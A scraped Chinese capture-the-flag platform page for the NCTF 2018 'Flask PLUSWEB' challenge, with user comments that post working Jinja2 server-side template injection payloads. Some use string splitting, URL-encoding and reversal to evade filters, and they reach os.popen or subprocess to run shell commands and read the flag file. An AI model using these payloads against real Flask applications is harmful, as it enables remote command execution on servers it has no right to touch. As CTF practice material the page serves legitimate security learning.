Flask PLUSWEB 未解决

分数: 0 金币: 0
所属赛事: NCTF 2018
题目作者: 未知
一  血: harry
一血奖励: 0金币
解  决: 76
提  示:
描  述:
yulige你又写bug了!
评论
不会编程的崽 6月前

%7B%7B''['__cl'+'ass__']['__ba'+'ses__'][0]['__subc'+'lasses__']()[218]['__in'+'it__']['__glo'+'bals__']['__bu'+'iltins__']['__imp'+'ort__']('o''s')['po''pen']('cat%20/Th1s_is__F1114g').read()%7D%7D

回复 0

minhaf 1年前

{{''["__ssalc__"[::-1]]["__esab__"[::-1]]["__sessalcbus__"[::-1]]()[223]('cat /Th1s_is__F1114g',shell=True,stdout=-1).communicate()[0].strip()}}

回复 0

希卡利 1年前

ssti模板注入,先试试{{7*7}},输出49就是有,再输入{{lipsum.__globals__['o''s']['pop''en']('ls /').read()}}就看到flag了

回复 0

2728462336 2年前

简单的SSTI模板注入

回复 0

WriteUp

image
sean

2 金币

评分(0)

暂无评分

解题动态

un 攻破了该题 14天前
tschick 攻破了该题 15天前
sanyeyise 攻破了该题 22天前
qixueying 攻破了该题 26天前
cmijohnson 攻破了该题 27天前
zyq.jocelyn 攻破了该题 27天前
yusawa 攻破了该题 27天前
时JZ雨 攻破了该题 27天前
MISINSG 攻破了该题 27天前
ZaneYork 攻破了该题 1月前
stardt 攻破了该题 1月前
yttitan 攻破了该题 1月前
Paradiso 攻破了该题 4月前
minz 攻破了该题 4月前
wyyyy 攻破了该题 4月前
sjjf 攻破了该题 4月前
温吞世俗人间烟火 攻破了该题 4月前
不会编程的崽 攻破了该题 6月前
mjh111 攻破了该题 6月前
forces 攻破了该题 6月前
问题反馈